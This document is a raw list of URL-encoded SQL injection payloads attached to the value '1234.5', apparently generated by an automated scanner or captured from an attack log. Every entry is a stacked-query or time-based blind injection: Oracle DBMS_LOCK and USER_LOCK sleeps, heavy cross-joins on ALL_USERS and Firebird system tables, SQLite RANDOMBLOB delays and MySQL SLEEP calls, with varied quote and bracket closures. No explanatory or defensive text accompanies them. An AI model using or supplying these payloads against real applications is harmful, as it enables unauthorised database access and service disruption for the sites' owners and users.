1234.5%22%20WHERE%209144%3D9144%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%20WHERE%205299%3D5299%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%7C%7C%28SELECT%20%27bwHM%27%20FROM%20DUAL%20WHERE%201419%3D1419%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%7C%7C%28SELECT%20%27hjHC%27%20WHERE%209955%3D9955%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%2B%28SELECT%20ONlX%20WHERE%206752%3D6752%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%2B%28SELECT%20%27hwmj%27%20WHERE%204948%3D4948%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%25%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%25%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%25%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%25%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%00%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%00%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%20WHERE%209747%3D9747%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%20WHERE%209258%3D9258%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%20WHERE%204237%3D4237%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%20WHERE%208130%3D8130%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%20WHERE%202207%3D2207%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%20WHERE%206666%3D6666%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%7C%7C%28SELECT%20%27hitV%27%20FROM%20DUAL%20WHERE%201642%3D1642%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%7C%7C%28SELECT%20%27wMXa%27%20WHERE%206101%3D6101%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%2B%28SELECT%20GhtC%20WHERE%206354%3D6354%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%2B%28SELECT%20%27fHNo%27%20WHERE%203681%3D3681%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%25%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%25%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%25%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%25%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%00%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%00%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%29%20WHERE%206005%3D6005%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%29%20WHERE%204988%3D4988%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%20WHERE%204891%3D4891%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%20WHERE%203968%3D3968%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%22%20WHERE%206834%3D6834%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%20WHERE%206341%3D6341%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%7C%7C%28SELECT%20%27QWoa%27%20FROM%20DUAL%20WHERE%207944%3D7944%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%7C%7C%28SELECT%20%27hdEf%27%20WHERE%204188%3D4188%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%2B%28SELECT%20pMuF%20WHERE%208990%3D8990%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%2B%28SELECT%20%27GXZf%27%20WHERE%203207%3D3207%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1234.5%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%25%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%25%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%25%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%25%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%00%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%00%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%20WHERE%204868%3D4868%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%20WHERE%205536%3D5536%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%20WHERE%205313%3D5313%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%20WHERE%205246%3D5246%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%20WHERE%208144%3D8144%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%20WHERE%205145%3D5145%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%7C%7C%28SELECT%20%27Yafo%27%20FROM%20DUAL%20WHERE%209230%3D9230%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%7C%7C%28SELECT%20%27rigw%27%20WHERE%209801%3D9801%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%2B%28SELECT%20MGza%20WHERE%208629%3D8629%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%2B%28SELECT%20%27XIEE%27%20WHERE%209915%3D9915%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%29%20WHERE%202657%3D2657%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%29%20WHERE%204207%3D4207%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%29%20WHERE%201264%3D1264%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%20WHERE%201775%3D1775%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%22%20WHERE%205228%3D5228%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%20WHERE%205943%3D5943%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%7C%7C%28SELECT%20%27ZHFA%27%20FROM%20DUAL%20WHERE%209808%3D9808%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%7C%7C%28SELECT%20%27mjpa%27%20WHERE%207759%3D7759%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%2B%28SELECT%20bngg%20WHERE%203259%3D3259%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%2B%28SELECT%20%27MwNA%27%20WHERE%203669%3D3669%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1234.5%29%20AND%20SLEEP%285%29 1234.5%27%29%20AND%20SLEEP%285%29 1234.5%27%20AND%20SLEEP%285%29 1234.5%22%20AND%20SLEEP%285%29 1234.5%29%20AND%20SLEEP%285%29%20AND%20%285755%3D5755 1234.5%29%29%20AND%20SLEEP%285%29%20AND%20%28%288212%3D8212 1234.5%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%285583%3D5583 1234.5%20AND%20SLEEP%285%29 1234.5%27%29%20AND%20SLEEP%285%29%20AND%20%28%27BwAT%27%3D%27BwAT 1234.5%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27VEiM%27%3D%27VEiM 1234.5%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27ICsG%27%3D%27ICsG 1234.5%27%20AND%20SLEEP%285%29%20AND%20%27OQLG%27%3D%27OQLG 1234.5%27%29%20AND%20SLEEP%285%29%20AND%20%28%27nJsm%27%20LIKE%20%27nJsm 1234.5%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27eKQr%27%20LIKE%20%27eKQr 1234.5%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27Qdei%27%20LIKE%20%27Qdei 1234.5%27%20AND%20SLEEP%285%29%20AND%20%27WkVp%27%20LIKE%20%27WkVp 1234.5%22%29%20AND%20SLEEP%285%29%20AND%20%28%22Wlrk%22%3D%22Wlrk 1234.5%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22Ajjk%22%3D%22Ajjk 1234.5%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22TBAD%22%3D%22TBAD 1234.5%22%20AND%20SLEEP%285%29%20AND%20%22TmLw%22%3D%22TmLw 